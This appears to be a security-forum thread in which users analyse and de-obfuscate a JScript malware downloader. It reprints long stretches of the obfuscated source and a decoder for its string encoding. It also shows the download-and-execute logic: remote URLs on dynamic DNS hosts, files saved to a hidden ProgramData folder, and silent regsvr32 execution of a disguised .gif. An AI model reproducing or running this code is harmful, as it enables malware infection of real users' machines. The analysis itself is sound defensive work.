//"C:\ProgramData\UserName\auidxx60.log"
if(edNaflwigtjy3gaFaqhlwugt.FileExists(ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("CEEEEEJFEEREMFHFH") + EqknugpammfreadFaqhlwugt + NaflwigtGwlnigiLpdkqufrRgxqojrn("CCIEUEXEP"))){
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("QEXFDFTFOFUDCDEFRDEDCDDFRDEFUFCFEDDDCFPFDFP") ;
if((ashtFaqhlwugtewaaGwlnigi != ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("XFAFAFXGEFXFYFJFRDEGCFXFK"))){
KkxqojrkkkBxmohen("CgxqojrGwlnigi");
}
}

if(! (sDpqgkqufr.FolderExists(ajgMaqkwugrshdkNameGwlnigi))){
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("RFPFDFFFSDDDFDEFSDFFSFSFSFVFQFP");
sDpqgkqufr.CreateFolder(ajgMaqkwugrshdkNameGwlnigi);
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("VFTFHGAFUFWDHDIFWDJDJDIDJFT");
}

HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("LESEXFOFJCWCXCXFRCWCXFRFMCWCXCYFMCYFMFPCXCWFKEXFK") ;
piIsqxeihynqwKkxqojr = NaflwigtGwlnigiLpdkqufrRgxqojrn("GCMCODABXDYDRDIDICP") + ")";
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("TFBFGFWFUDFDGDHFUDGFUDFDHFUFUFHFFFUFXDGDFFSFGFS") ;
AswjleihyutywreNaflwigt = Dpqgkqufrjhs11ksMaqkwugr;
Cgxqojrggrres1Lpdkqufr = 24-20;
Aswjleihyy356haeKkxqojr = 10-4 ;
CgxqojrolkijueBxmohen = Aswjleihyy356haeKkxqojr+Aswjleihyy356haeKkxqojr;
akDpqgkqufrjsdiGwlnigi = 816;
akDpqgkqufrjsdiGwlnigi = akDpqgkqufrjsdiGwlnigi+816;
akDpqgkqufrjsdiGwlnigi = akDpqgkqufrjsdiGwlnigi+400;
akDpqgkqufrjsdiGwlnigi = akDpqgkqufrjsdiGwlnigi+800;
akDpqgkqufrjsdiGwlnigi = akDpqgkqufrjsdiGwlnigi+32;
akDpqgkqufrjsdiGwlnigi = akDpqgkqufrjsdiGwlnigi+400;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("CEJEOFFFAFBENEPFDCNCPFDCPFGCOCNFBEOFB") ;
aEqknugpoeywMaqkwugr = 65;
aEqknugpoeywMaqkwugr = aEqknugpoeywMaqkwugr+35;
aEqknugpoeywMaqkwugr = aEqknugpoeywMaqkwugr+24;
aEqknugpoeywMaqkwugr = aEqknugpoeywMaqkwugr+50;
aEqknugpoeywMaqkwugr = aEqknugpoeywMaqkwugr+25;

HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("AEHEMFDEXFECLCMCNFBCLFBCNCMCMCLCMCLEYEMEY") ;

MaqkwugrxxhgsreIsqxeihy = NaflwigtGwlnigiLpdkqufrRgxqojrn("KEHFAFFDR");
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("KFLFLFHCQEHFA");
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("QEXFDFTFDFBFEFQFBFEFQFDFBFOFUDDDCFPFDFP") ;
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("RFMDYFS");
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("QFRFNEI");
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("KEREWFNFIFOEXFKEUEXEWFKEUEXEUEWEXFKEUEWEXCWCVFJEWFJ") ;
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("IETFGFK");
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("GERFGFH");
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("NEUFAFQFLFRDAFNEXFBEXFBFNEXFAFBCYFMFAFM") ;
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("LCRCY");
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("RCXDB");
Aswjleihyuhg3atCgxqojr = " (";
Gwlnigikjdyhe5gahsCgxqojr = 34871;
IsqxeihykjshsMaqkwugr = 32876;

HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("SFAFFFVFSFDFFFGFWFWFRFQFWFEFRFQFWDFDEFRFFFR");
fdKkxqojrjkuuqFaqhlwugt = NaflwigtGwlnigiLpdkqufrRgxqojrn("BDBDEDPDEDCCHDTFCFAEMEIEU");

KkxqojrfhttwshPlmeheiq = 2000+96+1500+500;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("TFBFGFWFRFSFRFXFSFRFSFXDGDFFSFGFS");
skdhKkxqojrgfiqwreiPlmeheiq = KkxqojrfhttwshPlmeheiq+KkxqojrfhttwshPlmeheiq;
ajskCgxqojrgfiuyriw4355Oafwhmtd = 1;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("OEVFBFRFMFSDBDAFNFCFDFFFDFBFFFBFN");
aKkxqojrsdhgfqiutrHafleiht = 2;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("WFEFJGAFUGBDJDIFVFNFLFJFNFLFJFNFLFKFJFV");

function GwlnigisdsfghlskEqknugp(cxjfkgriqdafGwlnigi, DpqgkqufrkjsadhieGwlnigi, NaflwigtkjsdsfgerieKkxqojr){
try
{
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("RFFFQDCDDDEFQFVFDFSFVFRFVDEDDFSFVDFDD");
cxjfkgriqdafGwlnigi.Write(DpqgkqufrkjsadhieGwlnigi);
cxjfkgriqdafGwlnigi.SaveToFile(NaflwigtkjsdsfgerieKkxqojr, aKkxqojrsdhgfqiutrHafleiht);
}
catch (Kkxqojr)
{

}
}

function Gwlnigishfiw11kjshasEqknugp(DpqgkqufrkjsadhieGwlnigi, NaflwigtkjsdsfgerieKkxqojr){
var cxjfkgriqdafGwlnigi;

try
{
cxjfkgriqdafGwlnigi = WScript.CreateObject(fdKkxqojrjkuuqFaqhlwugt);
cxjfkgriqdafGwlnigi.Type = ajskCgxqojrgfiuyriw4355Oafwhmtd;
cxjfkgriqdafGwlnigi.Open();
GwlnigisdsfghlskEqknugp(cxjfkgriqdafGwlnigi, DpqgkqufrkjsadhieGwlnigi, NaflwigtkjsdsfgerieKkxqojr);
}
catch (Kkxqojr)
{

}
}

EqknugpkjdshuMaqkwugr = NaflwigtGwlnigiLpdkqufrRgxqojrn("TEGFPGBFJFMFMFBDBDGDADC") + Aswjleihyuhg3atCgxqojr;
EqknugpjsdhrFaqhlwugt = NaflwigtGwlnigiLpdkqufrRgxqojrn("GEPFCFA") + NaflwigtGwlnigiLpdkqufrRgxqojrn("XFUFFFYFNFGFQFJDRCPEKEQEGECCPDNDEDGDRCPEUFNFSFIFTGCFXCPELERCPDM");
DpqgkqufrjsdhuiCgxqojr = EqknugpkjdshuMaqkwugr + EqknugpjsdhrFaqhlwugt + piIsqxeihynqwKkxqojr;

function MaqkwugrllaakkssdKkxqojr(sAswjleihy, sdGwlnigiawIsqxeihy){
var CgxqojrdjfgaaKkxqojr;
var sxJsqgxeohytrAHafleiht;
var stDpqgkqufrrBIsqxeihy;
var stNaflwigtreetrKkxqojr;
var stBxmohenrttrDLpdkqufr;
var cxjfkgriqdafGwlnigi;

try
{
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("KEREWFNFIFOFOEVFJEXFOFJEXFOEXCWCVFJEWFJ") ;
sxJsqgxeohytrAHafleiht = NaflwigtGwlnigiLpdkqufrRgxqojrn("XEEECER");
stDpqgkqufrrBIsqxeihy = "";
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("WFEFJGAFUGBDJDIFOFMFPFSFYFMFSFSFTFYFMFTFVFJFV") ;
stNaflwigtreetrKkxqojr = DpqgkqufrjsdhuiCgxqojr;
stBxmohenrttrDLpdkqufr = akDpqgkqufrjsdiGwlnigi+akDpqgkqufrjsdiGwlnigi+akDpqgkqufrjsdiGwlnigi+akDpqgkqufrjsdiGwlnigi;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("UFCFHFXFRFWFKFQFWFRFKFQFWFSFYDHDGFTFHFT") ;
CgxqojrdjfgaaKkxqojr = WScript.CreateObject(MaqkwugrxxhgsreIsqxeihy);
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("XFKFJFTFUGAFNFUFNFTGAFUDIFVFWFK");
CgxqojrdjfgaaKkxqojr.settimeouts(Gwlnigikjdyhe5gahsCgxqojr, 34566, Gwlnigikjdyhe5gahsCgxqojr, IsqxeihykjshsMaqkwugr);
CgxqojrdjfgaaKkxqojr.Option(AswjleihyutywreNaflwigt) = stNaflwigtreetrKkxqojr;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("DEKFDENENEPERENEPEREQEQCNCPCQ");
CgxqojrdjfgaaKkxqojr.Option(Cgxqojrggrres1Lpdkqufr) = stBxmohenrttrDLpdkqufr;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("DEKENEPEQERENEPERENEQEREPEQCNCQFE");
CgxqojrdjfgaaKkxqojr.Option(Aswjleihyy356haeKkxqojr) = BxmohentryetrdEqknugp;
CgxqojrdjfgaaKkxqojr.Option(CgxqojrolkijueBxmohen) = BxmohentryetrdEqknugp;
CgxqojrdjfgaaKkxqojr.Open(sxJsqgxeohytrAHafleiht, sAswjleihy, CgxqojrertydfgDpqgkqufr);
CgxqojrdjfgaaKkxqojr.Send(stDpqgkqufrrBIsqxeihy);
if((CgxqojrdjfgaaKkxqojr.Status == aEqknugpoeywMaqkwugr+KkxqojrkwerwweDpqgkqufr)){
MaqkwugrllaakkssdKkxqojr = CgxqojrdjfgaaKkxqojr.ResponseBody;
try
{
Gwlnigishfiw11kjshasEqknugp(CgxqojrdjfgaaKkxqojr.ResponseBody,sdGwlnigiawIsqxeihy);
}
catch (Kkxqojr)
{
}
}
}
catch (Kkxqojr)
{

}
CgxqojrdjfgaaKkxqojr = null;
cxjfkgriqdafGwlnigi = null;
}

"c:\\ProgramData\\" => NaflwigtGwlnigiLpdkqufrRgxqojrn("YEBDRFBFBEOFXFUFMFXFGFSECFGGAFGFBFB")
(which correspond to "%ALLUSERSPROFILE%" )
"UserName" => ppjjhMaqkwugrjjhGwlnigi.UserName ("DardiM" in my case)

Isqxeihyh4h4h4Bxmohen = NaflwigtGwlnigiLpdkqufrRgxqojrn("CDYDUELFBEREYFDCIDP");
// "WScript.N"
Kkxqojrh4h3h2Bxmohen = NaflwigtGwlnigiLpdkqufrRgxqojrn("IETFJFMFEFHFA");
// "etwork"
Eqknugpgja1111jhauNaflwigt = Isqxeihyh4h4h4Bxmohen+Kkxqojrh4h3h2Bxmohen;
// "WScript.Network"
ashtFaqhlwugtewaaGwlnigi = FaqhlwugtdfiuerBxmohen("RgxqojrnshuPlmeheiq");
ppjjhMaqkwugrjjhGwlnigi = WScript.CreateObject(Eqknugpgja1111jhauNaflwigt);
// WScript.CreateObject("WScript.Network");
dfDpqgkqufrregqqKkxqojr = ppjjhMaqkwugrjjhGwlnigi.UserName;
// UserName => "DardiM" for me

ajgMaqkwugrshdkNameGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("YEBDRFBFBEOFXFUFMFXFGFSECFGGAFGFBFB") + ppjjhMaqkwugrjjhGwlnigi.UserName;
// "c:\\ProgramData\\" + "DardiM"
//=> "c:\ProgramData\DardiM"

(1) ADODB.Stream is only used here to save files in "c:\ProgramData\UserName" (hidden Folder)
=> if the complete path doesn't exist, it is created.

"C:\ProgramData\UserName\UserNamexmda.jpg"
"C:\ProgramData\UserName\UserNamexmdb.jpg"
"C:\ProgramData\UserName\UserNamexmdc.jpg"
"C:\ProgramData\UserName\guildwg.gif"
"C:\ProgramData\UserName\UserNamewg.gif"

(2) The Regsvr32 Tool (regsvr32.exe) is used to register UserNamewg.gif in silent mode

Objet_Shell = new ActiveXObject("WScript.Shell");
Objet_Shell.run("cmd /c start regsvr32.exe /s C:\ProgramData\UserName\UserNamewg.gif" , 0, true);
WScript_Quit(0);

The other files downloaded are not ran by the downloader.

(3) .log files I found when dis-obfuscating

"C:\ProgramData\UserName\r2.log"
"C:\ProgramData\UserName\auid.log"
"C:\ProgramData\UserName\auidxx60.log"

An interesting point :

if current running script path is not "C:\ProgramData\UserName\system.wsf"
and "C:\ProgramData\UserName\auidxx60.log" exists
then the js downloader terminates : WScript_Quit(0);

if current running script path is not "C:\ProgramData\UserName\system.wsf"
then "C:\ProgramData\UserName\auid.log" is modified.

The WScript.ScriptFullName is written to the end of the log files content (option 8 : Open a file and write to the end)

(4) End of process

I said at the end of the first post
"The malware end with" :
Objet_Shell = new ActiveXObject("WScript.Shell");
Objet_Shell.run("cmd /c start regsvr32.exe /s C:\ProgramData\UserName\UserNamewg.gif" , 0, true);
WScript_Quit(0);

I mean "if everything goes as planned by js downloader"

The loop that creates the urls for several attempts to retrieve the files uses from i=0 to i = 355

"https://AswjleihyKkxqojr.infernew0"+ i + ".dynamicdns.biz/04/?v=60&x1x2c=[fileID]";
But it seems there are only 3 domains : 00 , 01, 02

frogboy · Jul 11, 2016

But i do learn more from these type of posts all the time. Thanks again.

DardiM · Jul 11, 2016

frogboy said:
But i do learn more from these type of posts all the time. Thanks again.

Thank you

I will try to make next analysis more clear (clearer) and to improve my "English"

LabZero · Jul 11, 2016

DardiM said:
My Thread is not an analysis from running (you can find it from the sample threads, or www.hybrid-analysis.com).
=> It's only an analysis of the obfuscated methods used on the downloader, and important parts that can be found with the main simplified decoder i made.

Downloading the sample and editing it is a good way to better understand my post. BUT TAKE CARE IF YOU DO IT

But I will try to answer

(0) No bitwise XOR found. I dis-obfuscated this way :
- I first simplified their decrypter (that uses several sub function) to make it more clean (and dis-obfuscated). We can see that they use char code technique from chars in the string passed as parameter.

function NaflwigtGwlnigiLpdkqufrRgxqojrn( a_string )
{
var first_char;
var current_decoded;
current_decoded = "";
first_char_before_loop_less_65 = a_string.charCodeAt(0) - 65;
a_string = a_string.substring(1);

while (a_string.length > 0){
current_decoded = current_decoded + String.fromCharCode( (a_string.charCodeAt(0) -65 ) * 25 + ( a_string.charCodeAt(1)-65 ) - first_char_before_loop_less_65 - 10);
a_string = a_string.substring(2);

}
return current_decoded;
}

- The decrypter for each NaflwigtGwlnigiLpdkqufrRgxqojrnal call => replaced step by step by real data
ex: NaflwigtGwlnigiLpdkqufrRgxqojrn("YEBDRFBFBEOFXFUFMFXFGFSECFGGAFGFBFB")
- replaced their variables (with strange name) by real contain (clear data or decrypted data from above decrypter). This can be seen on different spoiler parts I put on the first post.
- I removed all HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn([some useless string]);

A long example here :

aBxmohenisxxMaqkwugr = "2";
edCgxqojrkjdi1111khsdGwlnigi = 2+2+3+2+1;
EqknugpammfreadFaqhlwugt = "60";
LpdkqufrsljhirueCgxqojr = "\\";
sdFaqhlwugtkjtirtqKkxqojr = 0;
Dpqgkqufrjhs11ksMaqkwugr = 0;
Hafleihtjhs11ksPlmeheiq = 7+3+16+4+32+3;
BxmohentryetrdEqknugp = true;
CgxqojrertydfgDpqgkqufr = false
GwlnigiogijkoiytiLpdkqufr = 5-4;
EqknugpjhgdfsdMaqkwugr = 1+1;
CgxqojrkdjgdteQxbedyq = 2+4+6+3+7+3;
KkxqojrkwerwweDpqgkqufr = 3-2;
Eqknugpd7d7Cgxqojr = 0;

Faqhlwugtkjst4jayMaqkwugr = NaflwigtGwlnigiLpdkqufrRgxqojrn("UFXFCGCFKFQ");
kjIsqxeihyatOafwhmtd = NaflwigtGwlnigiLpdkqufrRgxqojrn("CDUENEUENELFD");
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("XFXFTFIFNGAFKGEFLFTFNFXGEGAFLFNGAGEFT");

var ppjjhMaqkwugrjjhGwlnigi ;
var dfDpqgkqufrregqqKkxqojr ;
var ajgMaqkwugrshdkNameGwlnigi;
var ashtFaqhlwugtewaaGwlnigi;
var Eqknugpgja1111jhauNaflwigt;

Isqxeihyh4h4h4Bxmohen = NaflwigtGwlnigiLpdkqufrRgxqojrn("CDYDUELFBEREYFDCIDP");
Kkxqojrh4h3h2Bxmohen = NaflwigtGwlnigiLpdkqufrRgxqojrn("IETFJFMFEFHFA");
Eqknugpgja1111jhauNaflwigt = Isqxeihyh4h4h4Bxmohen+Kkxqojrh4h3h2Bxmohen;
ashtFaqhlwugtewaaGwlnigi = FaqhlwugtdfiuerBxmohen("RgxqojrnshuPlmeheiq");
ppjjhMaqkwugrjjhGwlnigi = WScript.CreateObject(Eqknugpgja1111jhauNaflwigt);

dfDpqgkqufrregqqKkxqojr = ppjjhMaqkwugrjjhGwlnigi.UserName;
ajgMaqkwugrshdkNameGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("YEBDRFBFBEOFXFUFMFXFGFSECFGGAFGFBFB") + ppjjhMaqkwugrjjhGwlnigi.UserName;
//C:\\ProgramData\\UseName

ghetstHafleihtytqerGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("NEGEWFMFDFKFO");
ghetstHafleihtytqerGwlnigi = ghetstHafleihtytqerGwlnigi+NaflwigtGwlnigiLpdkqufrRgxqojrn("LFBFGEYCRDQFBFEEWEE");
ghetstHafleihtytqerGwlnigi = ghetstHafleihtytqerGwlnigi+NaflwigtGwlnigiLpdkqufrRgxqojrn("AFGFAFBELETDOEIEQELEJFB");
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("YFMFLFNFJFNFKGFGAGFFKFXGAGFFKFXGF");
sDpqgkqufr = WScript.CreateObject(ghetstHafleihtytqerGwlnigi);
//Scripting.FileSystemObject

edNaflwigtjy3gaFaqhlwugt = WScript.CreateObject(ghetstHafleihtytqerGwlnigi);
Cgxqojrjhhq23Eqknugp = WScript.CreateObject(ghetstHafleihtytqerGwlnigi);
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("HERETEUEVEREUERETEWFDFNFDEWFNFDFNFDCTCSCUCVCSCUCV");
aKkxqojrvitiLpdkqufr = WScript.CreateObject(ghetstHafleihtytqerGwlnigi);
aFaqhlwugthst33faLpdkqufr = WScript.CreateObject(ghetstHafleihtytqerGwlnigi);

CgxqojrkjdfhsyeDpqgkqufr = 1000+KkxqojrkwerwweDpqgkqufr+32;

//"C:\ProgramData\UserName\auidxx60.log"
if (edNaflwigtjy3gaFaqhlwugt.FileExists(ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("HEJEJEOFJEW") + NaflwigtGwlnigiLpdkqufrRgxqojrn("FEPFKFK") + EqknugpammfreadFaqhlwugt + NaflwigtGwlnigiLpdkqufrRgxqojrn("HCNFAFDEU"))){
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("DEKEPFGFBFHCPEPEQFDEQFDENEQENFDCOFCEPFC") ;
if((ashtFaqhlwugtewaaGwlnigi != ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("VEXEXFVGCFVFWFHFPDCGAFVFI"))){
KkxqojrkkkBxmohen("MaqkwugrDpqgkqufr");
}
}
//"C:\ProgramData\UserName\auidxx60.log"
if(edNaflwigtjy3gaFaqhlwugt.FileExists(ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("JELELEQFLEY") + NaflwigtGwlnigiLpdkqufrRgxqojrn("LEVFQFQ") + EqknugpammfreadFaqhlwugt + NaflwigtGwlnigiLpdkqufrRgxqojrn("OCUFHFKFC"))){
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("DEKEPFGFBFHFCEOFHFCEPFDENEQFHCPCOFEEQCOCOFCEPFC") ;
if((ashtFaqhlwugtewaaGwlnigi != ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("BEDEDFBFHFBFCEMEUCHFFFBEN"))){
KkxqojrkkkBxmohen("CgxqojrEqknugp");
}
}
//"C:\ProgramData\UserName\auidxx60.log"
if(edNaflwigtjy3gaFaqhlwugt.FileExists(ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("CEEEEEJFEEREMFHFH") + EqknugpammfreadFaqhlwugt + NaflwigtGwlnigiLpdkqufrRgxqojrn("CCIEUEXEP"))){
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("QEXFDFTFOFUDCDEFRDEDCDDFRDEFUFCFEDDDCFPFDFP") ;
if((ashtFaqhlwugtewaaGwlnigi != ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("XFAFAFXGEFXFYFJFRDEGCFXFK"))){
KkxqojrkkkBxmohen("CgxqojrGwlnigi");
}
}

if(! (sDpqgkqufr.FolderExists(ajgMaqkwugrshdkNameGwlnigi))){
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("RFPFDFFFSDDDFDEFSDFFSFSFSFVFQFP");
sDpqgkqufr.CreateFolder(ajgMaqkwugrshdkNameGwlnigi);
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("VFTFHGAFUFWDHDIFWDJDJDIDJFT");
}

HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("LESEXFOFJCWCXCXFRCWCXFRFMCWCXCYFMCYFMFPCXCWFKEXFK") ;
piIsqxeihynqwKkxqojr = NaflwigtGwlnigiLpdkqufrRgxqojrn("GCMCODABXDYDRDIDICP") + ")";
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("TFBFGFWFUDFDGDHFUDGFUDFDHFUFUFHFFFUFXDGDFFSFGFS") ;
AswjleihyutywreNaflwigt = Dpqgkqufrjhs11ksMaqkwugr;
Cgxqojrggrres1Lpdkqufr = 24-20;
Aswjleihyy356haeKkxqojr = 10-4 ;
CgxqojrolkijueBxmohen = Aswjleihyy356haeKkxqojr+Aswjleihyy356haeKkxqojr;
akDpqgkqufrjsdiGwlnigi = 816;
akDpqgkqufrjsdiGwlnigi = akDpqgkqufrjsdiGwlnigi+816;
akDpqgkqufrjsdiGwlnigi = akDpqgkqufrjsdiGwlnigi+400;
akDpqgkqufrjsdiGwlnigi = akDpqgkqufrjsdiGwlnigi+800;
akDpqgkqufrjsdiGwlnigi = akDpqgkqufrjsdiGwlnigi+32;
akDpqgkqufrjsdiGwlnigi = akDpqgkqufrjsdiGwlnigi+400;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("CEJEOFFFAFBENEPFDCNCPFDCPFGCOCNFBEOFB") ;
aEqknugpoeywMaqkwugr = 65;
aEqknugpoeywMaqkwugr = aEqknugpoeywMaqkwugr+35;
aEqknugpoeywMaqkwugr = aEqknugpoeywMaqkwugr+24;
aEqknugpoeywMaqkwugr = aEqknugpoeywMaqkwugr+50;
aEqknugpoeywMaqkwugr = aEqknugpoeywMaqkwugr+25;

HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("AEHEMFDEXFECLCMCNFBCLFBCNCMCMCLCMCLEYEMEY") ;

MaqkwugrxxhgsreIsqxeihy = NaflwigtGwlnigiLpdkqufrRgxqojrn("KEHFAFFDR");
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("KFLFLFHCQEHFA");
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("QEXFDFTFDFBFEFQFBFEFQFDFBFOFUDDDCFPFDFP") ;
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("RFMDYFS");
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("QFRFNEI");
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("KEREWFNFIFOEXFKEUEXEWFKEUEXEUEWEXFKEUEWEXCWCVFJEWFJ") ;
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("IETFGFK");
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("GERFGFH");
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("NEUFAFQFLFRDAFNEXFBEXFBFNEXFAFBCYFMFAFM") ;
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("LCRCY");
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("RCXDB");
Aswjleihyuhg3atCgxqojr = " (";
Gwlnigikjdyhe5gahsCgxqojr = 34871;
IsqxeihykjshsMaqkwugr = 32876;

HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("SFAFFFVFSFDFFFGFWFWFRFQFWFEFRFQFWDFDEFRFFFR");
fdKkxqojrjkuuqFaqhlwugt = NaflwigtGwlnigiLpdkqufrRgxqojrn("BDBDEDPDEDCCHDTFCFAEMEIEU");

KkxqojrfhttwshPlmeheiq = 2000+96+1500+500;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("TFBFGFWFRFSFRFXFSFRFSFXDGDFFSFGFS");
skdhKkxqojrgfiqwreiPlmeheiq = KkxqojrfhttwshPlmeheiq+KkxqojrfhttwshPlmeheiq;
ajskCgxqojrgfiuyriw4355Oafwhmtd = 1;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("OEVFBFRFMFSDBDAFNFCFDFFFDFBFFFBFN");
aKkxqojrsdhgfqiutrHafleiht = 2;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("WFEFJGAFUGBDJDIFVFNFLFJFNFLFJFNFLFKFJFV");

function GwlnigisdsfghlskEqknugp(cxjfkgriqdafGwlnigi, DpqgkqufrkjsadhieGwlnigi, NaflwigtkjsdsfgerieKkxqojr){
try
{
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("RFFFQDCDDDEFQFVFDFSFVFRFVDEDDFSFVDFDD");
cxjfkgriqdafGwlnigi.Write(DpqgkqufrkjsadhieGwlnigi);
cxjfkgriqdafGwlnigi.SaveToFile(NaflwigtkjsdsfgerieKkxqojr, aKkxqojrsdhgfqiutrHafleiht);
}
catch (Kkxqojr)
{

}
}

function Gwlnigishfiw11kjshasEqknugp(DpqgkqufrkjsadhieGwlnigi, NaflwigtkjsdsfgerieKkxqojr){
var cxjfkgriqdafGwlnigi;

try
{
cxjfkgriqdafGwlnigi = WScript.CreateObject(fdKkxqojrjkuuqFaqhlwugt);
cxjfkgriqdafGwlnigi.Type = ajskCgxqojrgfiuyriw4355Oafwhmtd;
cxjfkgriqdafGwlnigi.Open();
GwlnigisdsfghlskEqknugp(cxjfkgriqdafGwlnigi, DpqgkqufrkjsadhieGwlnigi, NaflwigtkjsdsfgerieKkxqojr);
}
catch (Kkxqojr)
{

}
}

EqknugpkjdshuMaqkwugr = NaflwigtGwlnigiLpdkqufrRgxqojrn("TEGFPGBFJFMFMFBDBDGDADC") + Aswjleihyuhg3atCgxqojr;
EqknugpjsdhrFaqhlwugt = NaflwigtGwlnigiLpdkqufrRgxqojrn("GEPFCFA") + NaflwigtGwlnigiLpdkqufrRgxqojrn("XFUFFFYFNFGFQFJDRCPEKEQEGECCPDNDEDGDRCPEUFNFSFIFTGCFXCPELERCPDM");
DpqgkqufrjsdhuiCgxqojr = EqknugpkjdshuMaqkwugr + EqknugpjsdhrFaqhlwugt + piIsqxeihynqwKkxqojr;

function MaqkwugrllaakkssdKkxqojr(sAswjleihy, sdGwlnigiawIsqxeihy){
var CgxqojrdjfgaaKkxqojr;
var sxJsqgxeohytrAHafleiht;
var stDpqgkqufrrBIsqxeihy;
var stNaflwigtreetrKkxqojr;
var stBxmohenrttrDLpdkqufr;
var cxjfkgriqdafGwlnigi;

try
{
